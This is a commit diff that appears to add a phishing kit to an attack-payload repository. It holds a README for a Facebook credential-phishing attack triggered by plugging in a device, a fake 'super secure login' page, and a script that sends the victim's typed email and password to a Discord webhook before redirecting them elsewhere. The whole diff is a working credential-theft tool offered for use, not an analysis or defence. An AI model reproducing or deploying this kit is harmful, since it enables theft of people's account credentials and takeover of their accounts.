Phishing material
parent
2c66bd7f76
commit
d7e86f3e4e
|
@ -0,0 +1,25 @@
|
|||
# Facebook Phishing Attack - Linux ✅
|
||||
|
||||
A script used to exfiltrate the Facebook username and password by a phishing attack.
|
||||
|
||||
**Category**: Phishing
|
||||
|
||||
## Description
|
||||
|
||||
A script used to exfiltrate the Facebook username and password by a phishing attack.
|
||||
|
||||
Opens a shell, create a tmp directory that will be deleted in 3600 seconds, move into the directory, download your own zip, unzip it, open the login page and close the shell.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* Internet Connection
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Discord wehbook (or whatever you want) into the login.js file at line 3
|
|
@ -0,0 +1,34 @@
|
|||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Form di Login con Bootstrap</title>
|
||||
<meta charset="utf-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1">
|
||||
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
|
||||
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
|
||||
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
|
||||
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
|
||||
</head>
|
||||
<body>
|
||||
<div class="container">
|
||||
<h2>Special and super secure login</h2>
|
||||
<form onsubmit="send_login(); return false;" method="post">
|
||||
<div class="form-group">
|
||||
<label for="email">Email:</label>
|
||||
<input type="email" class="form-control" id="email" placeholder="Insert your email">
|
||||
</div>
|
||||
<div class="form-group">
|
||||
<label for="password">Password:</label>
|
||||
<input type="password" class="form-control" id="password" placeholder="Insert your password">
|
||||
</div>
|
||||
<div class="form-check">
|
||||
<label class="form-check-label">
|
||||
<input type="checkbox" class="form-check-input"> Remember me
|
||||
</label>
|
||||
</div>
|
||||
<button type="submit" class="btn btn-primary">Login</button>
|
||||
</form>
|
||||
</div>
|
||||
</body>
|
||||
<script src="script.js"></script>
|
||||
</html>
|
|
@ -0,0 +1,32 @@
|
|||
async function send_login() {
|
||||
// SET YOUR DISCORD WEBHOOK or whatever you want to exfiltrate the data
|
||||
const discord_webhook_url = "https://discord.com/api/webhooks/123/abc";
|
||||
|
||||
// Retrieve data from POST form
|
||||
const email = document.getElementById('email').value;
|
||||
const password = document.getElementById('password').value;
|
||||
|
||||
// Create message content
|
||||
const message = "Email: " + email + " \n " + "Password: " + password;
|
||||
|
||||
try {
|
||||
// Send POST request to Discord webhook URL
|
||||
const response = await fetch(discord_webhook_url, {
|
||||
method: "POST",
|
||||
headers: {
|
||||
"Content-Type": "application/json"
|
||||
},
|
||||
body: JSON.stringify({ content: message })
|
||||
});
|
||||
if (response.ok) {
|
||||
window.location.href = "https://www.example.com";
|
||||
} else {
|
||||
// Otherwise, throw a generic error
|
||||
throw new Error('Generic error!');
|
||||
}
|
||||
} catch (error) {
|
||||
// Log any errors to the console
|
||||
console.error(error);
|
||||
}
|
||||
|
||||
}
|
Loading…
Reference in New Issue